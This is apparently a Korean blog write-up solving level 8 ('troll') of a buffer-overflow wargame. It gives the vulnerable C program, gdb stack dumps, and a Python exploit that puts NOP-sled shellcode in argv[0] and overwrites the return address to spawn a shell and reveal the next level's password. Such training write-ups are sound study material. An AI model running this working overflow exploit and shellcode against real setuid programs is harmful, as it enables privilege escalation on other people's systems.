BOF 원정대 – Level 8 (troll)

이번 문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
 char buffer[40];
 int i;

 // here is changed
 if(argc != 2){
 printf(argc must be two!\n);
 exit(0);
 }

 // egghunter 
 for(i=0; environ[i]; i++)
 memset(environ[i], 0, strlen(environ[i]));

 if(argv[1][47] != '\xbf')
 {
 printf(stack is still your friend.\n);
 exit(0);
 }

 // check the length of argument
 if(strlen(argv[1]) > 48){
 printf(argument is too long!\n);
 exit(0);
 }

 strcpy(buffer, argv[1]); 
 printf(%s\n, buffer);

 // buffer hunter
 memset(buffer, 0, 40);

 // one more!
 memset(argv[1], 0, strlen(argv[1]));
}

환경변수는 사용불가능 하며, argc도 2로 제약하고 있다. 그리고 argv[1]의 크기고 48 Byte만 허용하고 있으므로 이용할 수 있는 부분은 argv[0] 뿐이다. 이곳에 쉘코드를 입력하여 공격해 보도록 하자. 우선 argv[0] 주소를 확인해 보도록 하자.

[orge@localhost orge]$ cp troll `python -c print 'A'*100`
[orge@localhost orge]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r
Starting program: /home/orge/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Breakpoint 1, 0x8048506 in main ()
(gdb) x/32wx $esp
0xbffffa4c: 0x40021ca0 0xbffffa78 0x4000a970 0x400f855b
0xbffffa5c: 0x080496fc 0x4000ae60 0xbffffac4 0xbffffa78
0xbffffa6c: 0x080484eb 0x080496e8 0x080496fc 0xbffffa98
0xbffffa7c: 0x400309cb 0x00000001 0xbffffac4 0xbffffacc
0xbffffa8c: 0x40013868 0x00000001 0x08048450 0x00000000
0xbffffa9c: 0x08048471 0x08048500 0x00000001 0xbffffac4
0xbffffaac: 0x08048390 0x0804866c 0x4000ae60 0xbffffabc
0xbffffabc: 0x40013e90 0x00000001 0xbffffbbb 0x00000000
(gdb) 
0xbffffacc: 0xbffffc2b 0xbffffc3a 0xbffffc51 0xbffffc70
0xbffffadc: 0xbffffc92 0xbffffc9c 0xbffffe5f 0xbffffe7e
0xbffffaec: 0xbffffe98 0xbffffead 0xbffffec9 0xbffffed4
0xbffffafc: 0xbffffee1 0xbffffee9 0xbffffefa 0xbfffff04
0xbffffb0c: 0xbfffff12 0xbfffff23 0xbfffff31 0xbfffff3c
0xbffffb1c: 0xbfffff4c 0x00000000 0x00000003 0x08048034
0xbffffb2c: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffb3c: 0x00000006 0x00001000 0x00000007 0x40000000
(gdb) 
0xbffffb4c: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffb5c: 0x0000000b 0x000001fb 0x0000000c 0x000001fb
0xbffffb6c: 0x0000000d 0x000001fb 0x0000000e 0x000001fb
0xbffffb7c: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb6
0xbffffb8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffbbc: 0x656d6f68 0x67726f2f 0x41412f65 0x41414141
(gdb) 
0xbffffbcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbdc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbec: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbfc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc0c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc1c: 0x41414141 0x41414141 0x41414141 0x50004141
0xbffffc2c: 0x2f3d4457 0x656d6f68 0x67726f2f 0x45520065
0xbffffc3c: 0x45544f4d 0x54534f48 0x3239313d 0x3836312e
(gdb)

argv[0] 주소를 확인하였으니 넉넉잡아 0xbffffbfc 주소를 이용하여 공격을 해보자.

#!/usr/bin/python
import os
from struct import pack

shellcode = '\xeb\x1b\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x89\x74\x24\x01\x89\x44\x24\x05\xb0\x0b\x89\xf3\x8d\x4c\x24\x01\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh'

def main():
 payload1 = '\x90'*100 + shellcode
 payload2 = 'A'*44 + pack('<L', 0xbffffbfc)
 os.execl('/home/orge/troll', payload1, payload2)

if __name__ == '__main__':
 print '[+] Strat'
 main()
 print '[+] End'
[orge@localhost orge]$ ./ex.py 
[+] Strat
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 bash$ id
uid=508(troll) gid=507(orge) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
bash$ 

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다